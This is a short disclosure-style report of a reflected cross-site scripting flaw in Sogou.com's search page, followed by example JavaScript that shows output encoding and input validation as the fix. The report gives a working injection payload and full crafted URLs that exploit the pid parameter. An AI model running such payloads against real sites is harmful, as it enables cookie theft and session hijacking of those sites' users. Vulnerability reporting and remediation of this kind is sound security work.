There is an XSS found on Sogou.com

Severity: XSS
Confidence: Confident
Host: http://sogou.com
Path: /

Issue detail:

If you enter the following XSS vector in the search field:

"><video><source onerror=alert(document.cookie)>

I will get back the following page:

http://www.sogou.com/sogou?pid=AQxRG&query="><video><source onerror=alert(document.cookie)>

This particular results page will not cause any XSS. However, after looking at the page for several minutes, the parameter that actually causes the XSS is pid:

http://www.sogou.com/sogou?pid=AQxRG"><video><source onerror=alert(document.cookie)>&query="><video><source onerror=alert(document.cookie)>

Using the above link, you will see an XSS like the image below.
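The gap between the harmless query parameter and the exploitable pid parameter comes down to output encoding at the point of reflection. The following is an added example, not code from the original report or from Sogou; it assumes pid is echoed into a double-quoted HTML attribute, and the function names and the pid allow-list pattern are hypothetical.

```javascript
// Added illustration: hypothetical server-side rendering helpers.
// Assumption: the page reflects pid inside a double-quoted attribute value.

// pid value taken from the URL in the report above.
const REPORTED_PID = 'AQxRG"><video><source onerror=alert(document.cookie)>';

// Encode the characters that can end an attribute value or open a tag.
function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: raw concatenation lets `">` close the attribute
// and the tag, so the rest of the value is parsed as new markup.
function renderPidUnsafe(pid) {
  return '<input type="hidden" name="pid" value="' + pid + '">';
}

// Fix 1: contextual output encoding. The value stays inside the attribute.
function renderPidEncoded(pid) {
  return '<input type="hidden" name="pid" value="' + escapeHtmlAttr(pid) + '">';
}

// Fix 2 (defence in depth): pid looks like a short opaque token ("AQxRG"),
// so reject anything outside an assumed allow-list before encoding.
const PID_FORMAT = /^[A-Za-z0-9_-]{1,32}$/; // assumed format, not documented

function renderPidValidated(pid) {
  const value = PID_FORMAT.test(String(pid)) ? String(pid) : "";
  return renderPidEncoded(value);
}

// Review helper: true when the reflected value produced a raw element
// in the markup, which is the condition the report describes.
function injectsElement(html) {
  return /<video\b/i.test(html);
}

console.log("unsafe   :", injectsElement(renderPidUnsafe(REPORTED_PID)));
console.log("encoded  :", injectsElement(renderPidEncoded(REPORTED_PID)));
console.log("validated:", renderPidValidated(REPORTED_PID));
```

Every reflected parameter needs the same treatment; here the search field was handled and a secondary parameter was not.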